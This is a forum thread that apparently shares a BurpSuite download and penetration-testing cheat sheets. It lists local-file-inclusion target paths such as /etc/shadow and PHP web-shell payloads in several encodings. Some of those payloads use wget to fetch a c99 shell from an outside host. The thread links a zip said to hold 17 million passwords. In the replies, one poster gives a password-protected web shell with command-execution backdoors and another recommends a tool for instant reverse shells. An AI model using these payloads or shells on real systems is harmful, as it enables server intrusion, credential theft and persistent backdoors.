Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
BurpSuite v1.4 & loads of cheat sheet docs.
Options
-
24-03-2012 10:12pmBurpsuite can also be downloaded from here.
http://portswigger.net/burp/download.html
Example of zip contents and cheat sheet docs:
Contents of LFI folder:
Contents of LFI-InterestingFiles.txt/etc/issue /etc/motd /etc/passwd /etc/passwd /etc/shadow /etc/group /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits /usr/lib/security/mkuser.default /apache/logs/error.log /apache/logs/access.log /etc/httpd/logs/access.log /etc/httpd/logs/error_log /var/www/logs/access_log /var/www/logs/error.log /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /usr/local/apache/logs/error_log /usr/local/apache/logs/error.log /var/log/apache/access_log /var/log/apache2/access_log /var/log/apache/error.log /var/log/apache2/error.log /var/log/access_log /var/log/access.log /var/www/logs/error_log /var/www/logs/error.log /var/log/httpd/access_log /var/log/httpd/error_log /var/log/httpd/access_log /var/log/httpd/error_log /apache2/logs/error.log /apache2/logs/access.log /logs/error.log /logs/access.log /logs/error_log /logs/access_log /usr/local/apache2/logs/access_log /usr/local/apache2/logs/access.log /usr/local/apache2/logs/error_log /usr/local/apache2/logs/error.log /opt/lampp/logs/access_log /opt/lampp/logs/error_log /opt/xampp/logs/access_log /opt/xampp/logs/error_log /opt/lampp/logs/access.log /opt/lampp/logs/error.log /opt/xampp/logs/access.log /opt/xampp/logs/error.log /Program Files\Apache Group\Apache\logs\access.log /Program Files\Apache Group\Apache\logs\error.log /usr/local/apache/conf/httpd.conf /usr/local/apache2/conf/httpd.conf /etc/httpd/conf/httpd.conf /etc/apache/conf/httpd.conf /usr/local/etc/apache/conf/httpd.conf /etc/apache2/httpd.conf /usr/local/apache/conf/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache/httpd.conf /usr/local/apache2/httpd.conf /usr/local/httpd/conf/httpd.conf /usr/local/etc/apache/conf/httpd.conf /usr/local/etc/apache2/conf/httpd.conf /usr/local/etc/httpd/conf/httpd.conf /usr/apache2/conf/httpd.conf /usr/apache/conf/httpd.conf /usr/local/apps/apache2/conf/httpd.conf /usr/local/apps/apache/conf/httpd.conf /etc/apache/conf/httpd.conf /etc/apache2/conf/httpd.conf /etc/httpd/conf/httpd.conf /etc/http/conf/httpd.conf /etc/apache2/httpd.conf /etc/httpd/httpd.conf /etc/http/httpd.conf /etc/httpd.conf /opt/apache/conf/httpd.conf /opt/apache2/conf/httpd.conf /var/www/conf/httpd.conf /private/etc/httpd/httpd.conf /private/etc/httpd/httpd.conf.default /Volumes/webBackup/opt/apache2/conf/httpd.conf /Volumes/webBackup/private/etc/httpd/httpd.conf /Volumes/webBackup/private/etc/httpd/httpd.conf.default /Program Files\Apache Group\Apache\conf\httpd.conf /Program Files\Apache Group\Apache2\conf\httpd.conf /Program Files\xampp\apache\conf\httpd.conf /usr/local/php/httpd.conf.php /usr/local/php4/httpd.conf.php /usr/local/php5/httpd.conf.php /usr/local/php/httpd.conf /usr/local/php4/httpd.conf /usr/local/php5/httpd.conf /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php /usr/local/etc/apache/vhosts.conf /etc/php.ini /bin/php.ini /etc/httpd/php.ini /usr/lib/php.ini /usr/lib/php/php.ini /usr/local/etc/php.ini /usr/local/lib/php.ini /usr/local/php/lib/php.ini /usr/local/php4/lib/php.ini /usr/local/php5/lib/php.ini /usr/local/apache/conf/php.ini /etc/php4.4/fcgi/php.ini /etc/php4/apache/php.ini /etc/php4/apache2/php.ini /etc/php5/apache/php.ini /etc/php5/apache2/php.ini /etc/php/php.ini /etc/php/php4/php.ini /etc/php/apache/php.ini /etc/php/apache2/php.ini /web/conf/php.ini /usr/local/Zend/etc/php.ini /opt/xampp/etc/php.ini /var/local/www/conf/php.ini /etc/php/cgi/php.ini /etc/php4/cgi/php.ini /etc/php5/cgi/php.ini /php5\php.ini /php4\php.ini /php\php.ini /PHP\php.ini /WINDOWS\php.ini /WINNT\php.ini /apache\php\php.ini /xampp\apache\bin\php.ini /NetServer\bin\stable\apache\php.ini /home2\bin\stable\apache\php.ini /home\bin\stable\apache\php.ini /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini /usr/local/cpanel/logs /usr/local/cpanel/logs/stats_log /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log /var/cpanel/cpanel.config /var/log/mysql/mysql-bin.log /var/log/mysql.log /var/log/mysqlderror.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/mysql.log /var/lib/mysql/my.cnf /etc/mysql/my.cnf /etc/my.cnf /etc/logrotate.d/proftpd /www/logs/proftpd.system.log /var/log/proftpd /etc/proftp.conf /etc/protpd/proftpd.conf /etc/vhcs2/proftpd/proftpd.conf /etc/proftpd/modules.conf /var/log/vsftpd.log /etc/vsftpd.chroot_list /etc/logrotate.d/vsftpd.log /etc/vsftpd/vsftpd.conf /etc/vsftpd.conf /etc/chrootUsers /var/log/xferlog /var/adm/log/xferlog /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers /usr/sbin/pure-config.pl /usr/etc/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.conf /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/pureftpd/etc/pureftpd.pdb /usr/local/pureftpd/sbin/pure-config.pl /usr/local/pureftpd/etc/pure-ftpd.conf /etc/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pureftpd.pdb /etc/pureftpd.passwd /etc/pure-ftpd/pureftpd.pdb /usr/ports/ftp/pure-ftpd/ /usr/ports/net/pure-ftpd/ /usr/pkgsrc/net/pureftpd/ /usr/ports/contrib/pure-ftpd/ /var/log/pure-ftpd/pure-ftpd.log /logs/pure-ftpd.log /var/log/pureftpd.log /var/log/ftp-proxy/ftp-proxy.log /var/log/ftp-proxy /var/log/ftplog /etc/logrotate.d/ftp /etc/ftpchroot /etc/ftphosts /var/log/exim_mainlog /var/log/exim/mainlog /var/log/maillog /var/log/exim_paniclog /var/log/exim/paniclog /var/log/exim/rejectlog /var/log/exim_rejectlog
SQLi2Shell folder, file Basic-cmd-code.txt<?system('id');?> <?system('uname -a');?> <?php phpinfo(); ?> <?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?> <? system($_GET['c']); ?> 0x3c3f2073797374656d28245f4745545b2763275d293b203f3e PD8gc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg== %3C%3F%20system%28%24_GET%5B%27c%27%5D%29%3B%20%3F%3E char(60,63,32,115,121,115,116,101,109,40,36,95,71,69,84,91,39,99,39,93,41,59,32,63,62) data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=wget http://www.sh3ll.org/c99.txt -O shell.php php://filter/resource=http://www.sh3ll.org/c99.txt? php://filter/convert.base64-encode/resource=index php://filter/convert.base64-encode/resource=index.php data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami data:;base64,<? exec($_GET[cmd]); ?>&cmd=whoami data:;base64,PGZvcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8+IiBtZXRob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4IiB2YWx1ZT0iPD89aHRtbGVudGl0aWVzKCRfUE9TVFsneCddKT8+Ij48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0+PHByZT48PyAKZWNobyBgeyRfUE9TVFsneCddfWA7ID8+PC9wcmU+PD8gZGllKCk7ID8+Cgo= data:;base64,PGZvcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2BIiBtZXRob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4IiB2YWx1ZT0iPD89aHRtbGVudGl0aWVzKCRfUE9TVFsneCddKT8%2BIj48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2BPHByZT48PyAKZWNobyBgeyRfUE9TVFsneCddfWA7ID8%2BPC9wcmU%2BPD8gZGllKCk7ID8%2BCgo%3D
There is loads of good info if the txt files.. and there are 17+million passwords.
Download here:
http://uploading.com/files/189f32f1/BURP-testHR-.zip/Tagged:1
Comments
-
WTF "sh3ll.org"... Change that if I was you
Don't we know that they had a *slight* tendancy to backdoor their webshells? They are also 404 at the moment...
They *may* have cleaned them up, but a few months ago their c99 had a function that mailed its URL to some email account.
BTW, I have a massive repo of those C99 variants and similar over at:
http://code.google.com/p/web-malware-collection/0 -
WTF "sh3ll.org"... Change that if I was you
Don't we know that they had a *slight* tendancy to backdoor their webshells? They are also 404 at the moment...
They *may* have cleaned them up, but a few months ago their c99 had a function that mailed its URL to some email account.
BTW, I have a massive repo of those C99 variants and similar over at:
http://code.google.com/p/web-malware-collection/
It's only to give a guide, anyway you should always use your own shell. Your right, the sh3ll.org/c99.txt probably is backdoored.
If you were to use an untrusted shell you could always password protect it as soon as you upload it with something like:<?php $auth = 1; $name='2d5faffb6ac2a8844c05386b381c4282'; //MD5 Encrypt name. Default name = 900913 $pass='97a37c0a629997e6c51116e0f8340404'; //MD5 Encrypt pass. Default pass = P4s5W0rD_900913 if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="HELLO!"'); header('HTTP/1.0 401 Unauthorized'); exit("<b>????????? ???</b>"); } } ?> //Shell goes here. <pre> <?PHP include($_GET[d]);?> </pre>; <pre> <?PHP Passthru($_GET[cmd]);?> </pre>;
And then patch the vulnerability in the site/server.
Here's a good free online tool for encoding/encrypting php scripts.
http://tools88.com/safe/online_base64_decode.php
:-)0 -
Well as for shells w/ builtin protection - simply uploading the output from the following tool is my personal favourite (and is very often shown in my demos)
http://code.google.com/p/weevely/
It is quite possibly the most "friendly" backdoor, as it allows instant reverseshell (via /dev/tcp) and other useful things
Just output and pop it on your own host. Then use that in future0
Advertisement